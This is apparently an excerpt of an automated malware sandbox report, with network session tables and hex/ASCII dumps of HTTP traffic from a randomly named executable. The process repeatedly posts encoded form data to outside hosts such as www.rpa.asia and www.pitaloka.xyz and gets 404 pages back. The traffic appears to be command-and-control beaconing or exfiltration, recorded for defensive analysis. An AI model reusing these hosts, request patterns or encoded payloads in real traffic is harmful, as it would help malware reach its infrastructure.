                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.rpa.asia
                                                          Referer: http://www.rpa.asia/74m3/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 45 32 54 33 56 75 47 38 49 6d 43 31 52 2f 38 49 75 38 4e 43 2b 70 56 7a 73 58 4f 64 58 52 42 31 74 43 64 78 2f 35 58 6c 33 46 56 68 6c 6e 47 35 44 6e 35 64 36 4b 6c 59 66 64 72 7a 52 6b 30 2f 42 35 78 31 64 4e 6c 30 61 56 2b 51 56 32 66 2f 71 64 56 48 2f 46 59 43 53 33 71 49 47 52 4b 4e 6d 73 46 35 47 78 48 2b 75 5a 54 39 56 2b 79 74 39 74 47 55 4c 43 55 52 73 53 34 35 65 55 41 70 62 65 7a 2f 72 48 70 4a 49 70 59 53 57 69 65 71 74 48 39 6d 36 55 66 41 59 30 38 75 30 63 59 54 61 72 65 39 6f 4c 31 67 53 79 35 4e 64 2f 2b 73 71 55 47 61 6d 31 69 71 44 6b 70 58 64 6a 6e 36 63 4a 57 73 2f 63 5a 32 36 39 6e 43 63 37 45 71 50 41 3d 3d
                                                          Data Ascii: bdi02je=E2T3VuG8ImC1R/8Iu8NC+pVzsXOdXRB1tCdx/5Xl3FVhlnG5Dn5d6KlYfdrzRk0/B5x1dNl0aV+QV2f/qdVH/FYCS3qIGRKNmsF5GxH+uZT9V+yt9tGULCURsS45eUApbez/rHpJIpYSWieqtH9m6UfAY08u0cYTare9oL1gSy5Nd/+sqUGam1iqDkpXdjn6cJWs/cZ269nCc7EqPA==
                                                          Jan 10, 2025 23:07:42.946168900 CET1236INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:42 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:42.946202993 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.950002160.25.166.123805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:44.510704994 CET1770OUTPOST /74m3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.rpa.asia
                                                          Referer: http://www.rpa.asia/74m3/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 45 32 54 33 56 75 47 38 49 6d 43 31 52 2f 38 49 75 38 4e 43 2b 70 56 7a 73 58 4f 64 58 52 42 31 74 43 64 78 2f 35 58 6c 33 46 64 68 6c 52 79 35 43 41 6c 64 35 4b 6c 59 53 39 71 55 52 6b 30 59 42 35 70 78 64 4e 34 42 61 58 32 51 56 51 44 2f 6a 49 31 48 30 46 59 43 61 58 71 4a 43 52 4c 50 6d 73 31 39 47 78 58 2b 75 5a 54 39 56 38 71 74 72 76 75 55 4e 43 55 53 34 43 34 50 61 55 42 2b 62 65 62 76 72 42 31 5a 4c 64 6b 53 56 47 79 71 72 30 56 6d 79 55 66 47 57 55 39 39 30 63 46 4c 61 72 79 62 6f 4b 42 4b 53 78 5a 4e 63 71 62 68 33 30 62 43 2b 57 4f 39 41 58 4e 6a 43 44 47 64 62 4a 58 46 74 4a 42 47 71 74 61 53 61 34 52 39 51 63 6c 74 2b 47 75 36 54 69 4e 6c 4b 66 4e 36 75 36 69 43 4d 52 33 2b 59 38 74 78 35 73 4a 62 47 38 35 38 49 65 49 4d 6c 39 44 34 44 33 65 35 34 75 44 7a 62 4e 56 61 4e 42 47 48 47 6d 53 77 64 6a 79 61 2b 7a 45 62 57 6e 5a 57 61 66 65 37 73 6b 61 49 45 6f 61 7a 71 47 4a 58 58 4a 61 68 77 6b 56 35 42 51 39 4f 6d 47 2f 70 5a 57 36 37 6c 53 33 62 6d 33 43 36 59 61 [TRUNCATED]
                                                          Data Ascii: bdi02je=E2T3VuG8ImC1R/8Iu8NC+pVzsXOdXRB1tCdx/5Xl3FdhlRy5CAld5KlYS9qURk0YB5pxdN4BaX2QVQD/jI1H0FYCaXqJCRLPms19GxX+uZT9V8qtrvuUNCUS4C4PaUB+bebvrB1ZLdkSVGyqr0VmyUfGWU990cFLaryboKBKSxZNcqbh30bC+WO9AXNjCDGdbJXFtJBGqtaSa4R9Qclt+Gu6TiNlKfN6u6iCMR3+Y8tx5sJbG858IeIMl9D4D3e54uDzbNVaNBGHGmSwdjya+zEbWnZWafe7skaIEoazqGJXXJahwkV5BQ9OmG/pZW67lS3bm3C6Yad6h6xpQijol58CY9izNx9sMQp407lzv28V3ZxZRnXWrxY0DZ20e+OiMhsusmJ2tfKNy56kSbVbVeYkYoW+0Jnc9uDvo2b+IcFJC7W0nIHGI8br5WkzvKRVOHn3rM8rArJvv6tnsLX7CCiG8O8e4Lcj8GOYxVXO0LY43o07WGdmpzuLGLauvDkdwFZcjSKFCTw6vupptIKtlPr8D7jssGy2I3VNoX1U5Ss9QaYdO7ftBEd5jZA/VoDUOonHAluddyb5TqG9Ccx35WXG+r8xM7n742j9YK8PurlhliCi/IDZ8bnjbfmVZPH55W06pNPm1t9Kqc6SdV5KITn+WxHIEjn2EFIljPSSn8KIFGp+aRJRJyAdwq9S5VzrZxhg1L1utS+3onUJUPc2sT65CteZjJD853g9o8bcLKIHsusSWRKpjsiocy4Q5+18NBkCQHXdA7/dIDtOGdMIpxmA2fJb6mw+SkRFLqQ8D9T3YBixRgNIXUlc3WQuymSOd9AgJlMgMPBhrQTlN/EBCbMpUGVg8raPNZ3aESRApIdil/xAfhOzlw4qQUuArX/NBrbXZ7T+2e74n62Fbdoyw4hr3K9WiLxslcLkgggGJB01sbxpvQcGx8VMAegeD3bS01cDosRFB9wQqTbLU08UZk7COuDzRFVrZw4lnMMXiSxy [TRUNCATED]
                                                          Jan 10, 2025 23:07:45.439198017 CET1236INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:45 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:45.439220905 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.950003160.25.166.123805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:47.061144114 CET477OUTGET /74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:48.025239944 CET1236INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:47 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:48.025269985 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.95000468.66.226.119805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:53.111351967 CET745OUTPOST /iwk9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.pitaloka.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.pitaloka.xyz
                                                          Referer: http://www.pitaloka.xyz/iwk9/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 7a 70 67 75 37 36 4e 33 49 7a 51 72 6e 44 4a 73 76 79 78 49 72 51 77 2f 35 2f 78 64 75 49 33 76 39 53 4a 47 4a 6c 43 6c 31 56 4c 70 76 2b 79 55 68 61 48 42 4f 51 53 37 30 2b 39 50 58 2f 58 4f 53 63 46 42 55 4f 65 76 76 64 42 57 2b 77 39 62 6a 78 70 48 49 4e 72 44 38 43 6a 6e 56 53 7a 31 54 42 65 4a 44 67 38 6f 72 62 66 56 4c 5a 6e 41 6c 48 48 51 4a 6d 67 77 38 46 74 65 63 55 75 77 75 69 52 51 50 61 49 51 73 78 75 7a 49 62 38 4d 69 47 79 53 53 4a 36 63 4a 39 78 6c 78 75 33 49 45 51 61 7a 46 4d 32 6c 4f 2b 43 4c 43 64 6b 7a 39 69 39 55 61 48 36 4f 57 42 73 30
                                                          Data Ascii: bdi02je=zpgu76N3IzQrnDJsvyxIrQw/5/xduI3v9SJGJlCl1VLpv+yUhaHBOQS70+9PX/XOScFBUOevvdBW+w9bjxpHINrD8CjnVSz1TBeJDg8orbfVLZnAlHHQJmgw8FtecUuwuiRQPaIQsxuzIb8MiGySSJ6cJ9xlxu3IEQazFM2lO+CLCdkz9i9UaH6OWBs0
                                                          Jan 10, 2025 23:07:53.660692930 CET605INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:53 GMT
                                                          Server: Apache
                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.95000568.66.226.119805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:55.658931017 CET769OUTPOST /iwk9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.pitaloka.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.pitaloka.xyz
                                                          Referer: http://www.pitaloka.xyz/iwk9/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 7a 70 67 75 37 36 4e 33 49 7a 51 72 6d 6a 35 73 73 56 6c 49 70 77 77 38 31 66 78 64 6b 6f 32 6d 39 53 46 47 4a 6e 79 4c 32 6e 76 70 75 61 32 55 6d 66 7a 42 43 77 53 37 2b 65 38 46 61 66 58 4a 53 63 4a 33 55 4c 6d 76 76 63 6c 57 2b 79 6c 62 6a 41 70 41 4c 39 72 42 30 69 6a 6c 4c 69 7a 31 54 42 65 4a 44 67 70 2f 72 59 76 56 49 6f 33 41 6b 69 37 58 56 32 67 33 31 6c 74 65 59 55 75 38 75 69 52 69 50 62 55 2b 73 7a 6d 7a 49 5a 30 4d 68 53 47 56 63 4a 36 67 48 64 77 76 67 39 4f 6c 48 6e 4f 52 44 2b 71 62 65 6f 53 55 4d 63 59 74 73 51 30 50 50 51 36 70 52 6d 6c 63 36 57 36 71 54 4d 33 43 36 31 65 74 71 57 4b 6c 65 57 4c 4b 32 51 3d 3d
                                                          Data Ascii: bdi02je=zpgu76N3IzQrmj5ssVlIpww81fxdko2m9SFGJnyL2nvpua2UmfzBCwS7+e8FafXJScJ3ULmvvclW+ylbjApAL9rB0ijlLiz1TBeJDgp/rYvVIo3Aki7XV2g31lteYUu8uiRiPbU+szmzIZ0MhSGVcJ6gHdwvg9OlHnORD+qbeoSUMcYtsQ0PPQ6pRmlc6W6qTM3C61etqWKleWLK2Q==
                                                          Jan 10, 2025 23:07:56.232325077 CET605INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:56 GMT
                                                          Server: Apache
                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          31192.168.2.95000668.66.226.11980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:58.674493074 CET1782OUTPOST /iwk9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.pitaloka.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.pitaloka.xyz
                                                          Referer: http://www.pitaloka.xyz/iwk9/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 7a 70 67 75 37 36 4e 33 49 7a 51 72 6d 6a 35 73 73 56 6c 49 70 77 77 38 31 66 78 64 6b 6f 32 6d 39 53 46 47 4a 6e 79 4c 32 6e 6e 70 76 76 69 55 6d 38 72 42 4d 51 53 37 39 65 38 47 61 66 57 56 53 63 52 72 55 4c 6a 51 76 65 74 57 2f 52 74 62 7a 79 42 41 51 4e 72 42 72 79 6a 6f 56 53 7a 61 54 41 79 4e 44 67 35 2f 72 59 76 56 49 71 66 41 79 48 48 58 46 47 67 77 38 46 73 4b 63 55 76 56 75 69 35 79 50 62 51 41 73 43 47 7a 49 36 63 4d 6b 6e 79 56 44 35 36 59 53 64 78 36 67 38 79 6d 48 6a 75 6e 44 2f 75 78 65 76 6d 55 4d 36 78 6f 37 6a 41 34 61 41 47 66 52 6c 63 31 69 52 65 54 53 74 66 47 71 77 65 6f 39 6d 58 54 66 57 62 43 74 56 59 7a 55 7a 64 7a 33 6e 75 30 34 67 6e 45 4f 75 63 6e 75 6a 64 52 66 47 67 7a 73 67 6a 62 61 6c 59 2b 4d 63 68 6f 75 34 52 61 67 33 67 4b 58 68 39 59 61 67 7a 6a 6a 66 59 61 74 49 55 53 46 64 74 66 42 6b 57 38 61 44 45 76 66 44 55 2b 64 36 7a 44 45 64 6d 54 33 7a 68 69 55 41 61 56 43 36 75 36 6e 57 44 68 68 56 5a 62 4c 6f 39 32 6d 56 6e 4a 6f 4b 74 4c 61 66 [TRUNCATED]
